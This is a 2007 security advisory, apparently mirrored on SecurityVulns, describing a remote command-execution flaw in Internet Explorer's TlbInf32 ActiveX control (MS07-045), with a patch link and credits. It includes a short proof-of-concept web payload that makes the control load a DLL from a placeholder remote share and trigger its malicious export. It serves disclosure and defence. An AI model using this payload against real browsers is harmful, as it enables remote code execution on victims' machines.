TlbInf32 ActiveX Command Execution

2007-08-17T00:00:00
ID SECURITYVULNS:DOC:17831
Type securityvulns
Reporter Securityvulns
Modified 2007-08-17T00:00:00

Description

======================================================================== = TlbInf32 ActiveX Command Execution = = MS Bulletin posted:
= http://www.microsoft.com/technet/security/Bulletin/MS07-045.mspx = = Affected Software: = Internet Explorer = tlbInf32.dll = vstlbinf.dll = = Public disclosure on Wednesday August 15, 2007 ========================================================================

The TypeLib Information object library , implemented in TlbInf32.dll, is a set of COM objects designed to make type library browsing functionality easily accessible to both Visual Basic and C++ programmers.

Although it is not marked as safe for scripting in the registry, it does implement IObjectSafety.

Report for Clsid: {8B217746-717D-11CE-AB5B-D41203C10000} RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data

The TypeLibInfoFromFile() function is used to open a file and retrieve the typelib information from it.

TypeLibInfoFromFile(ByVal FileName As String) As TypeLibInfo

This function will accept a webdav/smb share to a DLL file, allowing the retrieval of information from a DLL hosted on a remote server.

======================================================================== TlbInf32.chm Type libraries can contain help information for the library itself (TypeLibInfo object), each TypeInfo (TypeInfo object), and each member (MemberInfo object). This information is available in several different forms.

HelpString is the documentation string which appears as a short description of the string in object browsers. If the optional LCID (Language/Country identifier) is specified, then the returned string is localized if possible.

Documentation strings can be stored either in the type library directly or retrieved via a call to the DLLGetDocumentation entry point in the Dll specified by the HelpStringDll property.

The HelpStringContext is passed to the HelpStringDll to get the correct documentation string for the object. The HelpStringDll and HelpStringContext properties values are used automatically by the HelpString property. ========================================================================

If the DLL file specified in the call to TypeLibInfoFromFile() has been modified to direct the HelpStringDll property to a DLL which exports a malicious DLLGetDocumentation function, then this function will be executed when a request for the HelpString property is made.

<object width=1000 height=20 classid="CLSID:<CLASSID>" name=test></object> x= test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll") ' Call the remote DLLGetDocumentation function alert(x.Interfaces.Item(a).Members.Item(b).HelpString)

== Solutions ==

Install the vendor supplied patch. http://www.microsoft.com/technet/security/Bulletin/MS07-045.mspx

== Credit ==

Discovered and advised to Microsoft November 23 2006 by Brett Moore of Security-Assessment.com

As this is my last advisory release before I leave sa.com and head off into the future, I gotta say thanx to the team there, its been a blast guys.

All you kiwis overseas have you thought about a trip home. www.kiwicon.org

+-SoSD-+